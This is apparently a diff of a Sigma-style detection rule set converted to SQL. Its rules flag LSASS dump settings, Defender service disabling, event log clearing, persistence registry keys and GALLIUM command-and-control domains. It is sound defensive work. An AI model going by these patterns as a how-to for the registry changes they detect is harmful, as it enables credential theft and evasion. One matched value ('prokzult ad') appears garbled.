'%\\\\Services\\\\WinSock2\\\\Parameters\\\\AutodialDLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_autodial_dll.yml" + "filename": "win_shell_core_susp_packages_installed.yml" }, { - "title": "Potential Attachment Manager Settings Attachments Tamper", - "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "title": "Scheduled Task Executed Uncommon LOLBIN", + "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", "status": "experimental", - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND NewValue = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" ], - "filename": "registry_set_policies_attachments_tamper.yml" + "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" }, { - "title": "Potential PendingFileRenameOperations Tamper", - "id": "4eec988f-7bf0-49f1-8675-1e6a510b3a2a", + "title": "Scheduled Task Executed From A Suspicious Location", + "id": "424273ea-7cf8-43a6-b712-375f925e481f", "status": "experimental", - "description": "Detect changes to the \"PendingFileRenameOperations\" registry key from uncommon or suspicious images lcoations to stage currently used files for rename after reboot.", - "author": "frack113", + "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.003" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Installers and updaters may set currently in use files for rename after a reboot." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\PendingFileRenameOperations%' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "registry_set_susp_pendingfilerenameoperations.yml" + "filename": "win_taskscheduler_execution_from_susp_locations.yml" }, { - "title": "Register New IFiltre For Persistence", - "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "title": "Important Scheduled Task Deleted", + "id": "9e3cb244-bdb8-4632-8c90-6079c8f4f16d", "status": "experimental", - "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Legitimate registration of IFilters by the OS or software" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_ifilter.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Lsass Full Dump Request Via DumpType Registry Settings", - "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", - "status": "experimental", - "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", - "author": "@pbssubhash", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", + "status": "test", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Legitimate application that needs to do a full dump of their process" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND NewValue = 'DWORD (0x00000002)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_lsass_usermode_dumping.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Potential Persistence Via Event Viewer Events.asp", - "id": "a1e11042-a74a-46e6-b07c-c4ce8ecc239b", - "status": "test", - "description": "Detects potential registry persistence technique using the Event Viewer \"Events.asp\" technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "title": "New Firewall Rule Added In Windows Firewall Exception List", + "id": "cde0a575-7d3d-4a49-9817-b8004a7bf105", + "status": "experimental", + "description": "Detects when a rule has been added to the Windows Firewall exception list", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2004', '2071') AND NOT ((Action = '2') OR ((ApplicationPath LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ApplicationPath LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\oobe\\\\Setup.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\dllhost.exe' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_add_rule.yml" + }, + { + "title": "Windows Defender Firewall Has Been Reset To Its Default Configuration", + "id": "04b60639-39c0-412a-9fbe-e82499c881a3", + "status": "experimental", + "description": "Detects activity when Windows Defender Firewall has been reset to its default configuration", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2032', '2060'))" + ], + "filename": "win_firewall_as_reset_config.yml" + }, + { + "title": "Windows Firewall Settings Have Been Changed", + "id": "00bb5bd5-1379-4fcf-a965-a5b6f7478064", + "status": "experimental", + "description": "Detects activity when the settings of the Windows firewall have been changed", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2002', '2083', '2003', '2082', '2008'))" ], + "filename": "win_firewall_as_setting_change.yml" + }, + { + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionURL%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgram' ESCAPE '\\' AND NewValue LIKE '\\%\\%SystemRoot\\%\\%\\\\PCHealth\\\\HelpCtr\\\\Binaries\\\\HelpCtr.exe' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Event Viewer\\\\MicrosoftRedirectionProgramCommandLineParameters' ESCAPE '\\' AND NewValue LIKE '-url hcp://services/centers/support_topic=\\%\\%s' ESCAPE '\\') OR (NewValue = 'http://go.microsoft.com/fwlink/events.asp') OR (NewValue = '(Empty)')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_event_viewer_events_asp.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "New File Association Using Exefile", - "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", - "status": "test", - "description": "Detects the abuse of the exefile handler in new file association. Used for bypass of security products.", - "author": "Andreas Hunkeler (@Karneades)", - "tags": [ - "attack.defense_evasion" + "title": "A Rule Has Been Deleted From The Windows Firewall Exception List", + "id": "c187c075-bb3e-4c62-b4fa-beae0ffc211f", + "status": "experimental", + "description": "Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall", + "author": "frack113", + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2006', '2052') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "falsepositives": [ - "Unknown" + "filename": "win_firewall_as_delete_rule.yml" + }, + { + "title": "The Windows Defender Firewall Service Failed To Load Group Policy", + "id": "7ec15688-fd24-4177-ba43-1a950537ee39", + "status": "experimental", + "description": "Detects activity when The Windows Defender Firewall service failed to load Group Policy", + "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID = '2009')" ], + "filename": "win_firewall_as_failed_load_gpo.yml" + }, + { + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND NewValue = 'exefile' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "registry_set_file_association_exefile.yml" + "filename": "win_firewall_as_delete_all_rules.yml" }, { - "title": "COM Hijacking via TreatAs", - "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", + "title": "Firewall Rule Modified In The Windows Firewall Exception List", + "id": "5570c4d9-8fdd-4622-965b-403a5a101aa0", "status": "experimental", - "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "description": "Detects when a rule has been modified in the windows firewall exception list", "author": "frack113", + "level": "low", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND EventID IN ('2005', '2073') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "win_firewall_as_change_rule.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_set_treatas_persistence.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "Registry Explorer Policy Modification", - "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "status": "test", - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "author": "frack113", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate admin script" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_set_set_nopolicies_user.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Windows Defender Service Disabled", - "id": "e1aa95de-610a-427d-b9e7-9b46cfafbe6a", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects when an attacker or tool disables the Windows Defender service (WinDefend) via the registry", - "author": "Ján Trenčanský, frack113, AlertIQ, Nasreddine Bencherchali", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Administrator actions" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\WinDefend\\\\Start' ESCAPE '\\' AND NewValue = 'DWORD (0x00000004)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_disable_windows_defender_service.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Winlogon Notify Key Logon Persistence", - "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ - "attack.persistence", - "attack.t1547.004" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND NewValue LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_winlogon_notify_key.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": 